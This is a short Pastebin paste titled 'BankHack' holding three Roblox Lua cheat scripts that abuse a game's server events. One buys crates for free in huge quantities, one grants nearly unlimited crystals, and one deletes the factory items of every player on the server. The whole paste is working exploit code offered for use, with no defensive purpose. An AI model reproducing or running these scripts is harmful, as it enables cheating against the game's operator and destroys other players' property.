BankHack

Untitled

Jul 29th, 2018
528
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.91 KB | None | 0 0
  1. Unlimited crates -
  2.  
  3. local meme = "Regular Crate"
  4. local price = 0
  5. local quantity = 999999999
  6. local Event = game:GetService("ReplicatedStorage").PurchaseCrate
  7. Event:FireServer(meme,price,quantity)
  8.  
  9.  
  10. Unlimited crystals-
  11.  
  12. -- Crystals
  13. local amount = 99999999999
  14. game.ReplicatedStorage.UpdateCrystals:FireServer(amount)
  15.  
  16.  
  17. Delete peoples plots-
  18.  
  19. local localplayerDelete = true
  20. local a = game:GetService("Players"):GetPlayers()
  21. local Event = game:GetService("ReplicatedStorage").DeleteItem
  22. for i,v in next, a do
  23. if(localplayerDelete == true) then
  24. for _,x in next, workspace.factories[v.Name].Items:GetChildren() do
  25. Event:FireServer(x)
  26. end
  27. elseif(v.Name ~= game:GetService("Players").LocalPlayer.Name and localplayerDelete == false) then
  28. for _,x in next, workspace.factories[v.Name].Items:GetChildren() do
  29. Event:FireServer(x)
  30. end
  31. end
  32. end
Add Comment
Please, Sign In to add comment